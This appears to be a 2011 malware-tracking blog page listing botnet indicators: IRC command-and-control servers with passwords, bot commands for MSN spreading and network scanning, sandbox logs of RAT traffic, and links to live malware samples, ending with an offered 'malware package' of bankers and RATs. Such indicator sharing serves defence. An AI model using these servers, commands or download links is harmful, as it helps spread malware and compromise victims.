Month: April 2011

Remote Host Port Number 194.247.48.58 47221 PASS ngrBot or PASS letmein 213.251.170.52 80 64.120.161.214 80 NICK n{US|XPa}kngcdtw USER kngcdtw 0 0 :kngcdtw JOIN #ngr ngrBot PRIVMSG #ngr :[MSN]: Updated MSN spread interval to “8” PRIVMSG #ngr :[MSN]: Updated MSN spread message to “http://rapidshare.com/files/455562571/Picture5437.JPG-.com” PRIVMSG #ngr :[d=”http://websoftwarecentral.in/install.48208.exe” s=”79872 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.tmp” –Read more...

74.117.174.122 16667 Nick [AUT]XP-SP3[00]1637 User qdnip Chanel #l# * Now talking in #l# * Topic is ‘.advscan asn445 100 5 800 -b -r -s ‘ * Set by net{out} on Mon Mar 28 02:51:30 infos about hosting: http://whois.domaintools.com/74.117.174.122

92.241.164.191 8718 Nick iRCBpCcp User imegnmev Chanel #c * Now talking in #c * Topic is ‘=YAkqI6shDgtWfdpShKEqhe91ihDqfdJHG+e1RwymEerIvbHlnlEw1FLT5QzEyymeqUJLok/mEx8bN/3vzdkBF0szOfdFUxl ‘ * Set by febreg on Fri Apr 01 09:57:47 infos about hosting: http://whois.domaintools.com/92.241.164.191

el peruviano hecker here sharedfud.dyndns-work.com 200.106.35.109 sountracker.dyndns-mail.com 200.106.35.109 Outgoing connection to remote server: sharedfud.dyndns-work.com TCP port 3461 Outgoing connection to remote server: sharedfud.dyndns-work.com TCP port 3460 Outgoing connection to remote server: sharedfud.dyndns-work.com TCP port 3460 Outgoing connection to remote server: sharedfud.dyndns-work.com TCP port 3461 Outgoing connection to remote server: sharedfud.dyndns-work.com TCP port 3461 Outgoing connectionRead more...

Remote Host Port Number 173.242.123.150 2235 PASS wiggernet Current Local Users: 160 Max: 630 Current Global Users: 160 Max: 483 MODE LNO|746499630 -ix JOIN #likenoneother# boss USERHOST LNO|746499630 PONG :MrWiiWii.IRC.NET NICK LNO|746499630 USER wlnmyriwl 0 0 :LNO|746499630 infos about hosting: http://whois.domaintools.com/173.242.123.150

dl.sd.keniu.com dl.sd.keniu.com 123.235.32.185 stat.sd.keniu.com stat.sd.keniu.com 219.232.254.35 Outgoing connection to remote server: dl.sd.keniu.com TCP port 80 Outgoing connection to remote server: 123.235.32.247 TCP port 80 Outgoing connection to remote server: 218.29.42.138 TCP port 80 Outgoing connection to remote server: stat.sd.keniu.com TCP port 80 exe file http://www.multiupload.com/SGDN1Z6H3Q virustotal scan http://www.virustotal.com/file-scan/report.html?id=22ccc8633a1c0b255aa07459b5343b4ab24c07e3e0fe15a7f1b23e8dd86b43cf-1301688919 infos about hosting: http://whois.domaintools.com/219.232.254.35 http://whois.domaintools.com/123.235.32.247

blackshades.info 173.192.176.139 Outgoing connection to remote server: blackshades.info TCP port 8080 Outgoing connection to remote server: blackshades.info TCP port 8080 exe file http://www.multiupload.com/ORXAMUSALM infos about hosting: http://whois.domaintools.com/173.192.176.139

American hecker here khant14.sytes.net 75.134.34.140 Outgoing connection to remote server: khant14.sytes.net TCP port 71 Outgoing connection to remote server: khant14.sytes.net TCP port 71 exe file http://www.multiupload.com/9T08BMWN6C infos about hecker http://whois.domaintools.com/75.134.34.140

client.vpn8.info DNS_TYPE_A 119.145.115.77 YES udp – HTTP Conversations: From ANUBIS:1029 to 119.145.115.77:8000 – [client.vpn8.info:8000] Request: GET /vpnclient/vpnlist.txt Response: 200 “OK” From ANUBIS:1030 to 119.145.115.77:8000 – [client.vpn8.info:8000] Request: GET /vpnclient/top.htm Response: 200 “OK” From ANUBIS:1031 to 119.145.115.77:8000 – [client.vpn8.info:8000] Request: GET /vpnclient/gonggao.htm Response: 200 “OK” From ANUBIS:1032 to 119.145.115.77:8000 – [client.vpn8.info:8000] Request: GET /vpnclient/vpn.jpg Response: 200Read more...

Here u go for another malware package mostly bankers,rats Download: http://018a2ff9.whackyvidz.com